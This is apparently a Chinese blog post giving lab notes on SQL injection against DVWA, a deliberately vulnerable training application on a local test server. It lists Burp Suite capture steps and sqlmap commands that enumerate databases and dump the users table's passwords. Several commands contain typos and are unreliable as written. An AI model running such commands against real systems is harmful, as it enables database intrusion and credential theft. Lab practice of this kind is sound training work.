DVWA(靶机)-----sql注入简单利用笔记

mac2026-02-05  0

关于DVWA的介绍网上太多。

实验环境:

windows2003服务器(192.168.152.128)

DVWA源码包

攻击过程:

step1:打开浏览器,设代理 ,Burpsuite设代理 。

step2:抓包如图,保存为sql_low.txt。

网址:http://192.168.152.128/dvwa/vulnerabilities/sqli/

step3:使用sqlmap命令进行注入攻击

命令:sqlmap -r sql_low.txt --level=5 --risk=3 --dbs

step4:成功得到所有数据库名

step5:查看当前数据库

命令:sqlmap -r sql_low.txt --level=5 risk=3 --current-db

step6:查看数据库的所有表

命令:sqlmap -sql_low.txt --level=5 --risk=3 -D dvwa --tables

step7:查看表中的数据

命令:sqlmap -r sql_low.txt --level=5 --risk=3 -D dvwa -T users --columns

step7:查看数据内容

命令:sqlmap -r sql_low.txt --level=5 --risk=3 -D dvwa -T users -C "password,user" --dump

结果:

Medium级别类似。

命令:sqlmap -r sql_medium.txt --leve=5 --risk=3 --dbs

high级别 查看是否具有注入点

命令:sqlmap -r sql_high.txt --level=5 --risk=3 -p id

 

最新回复(0)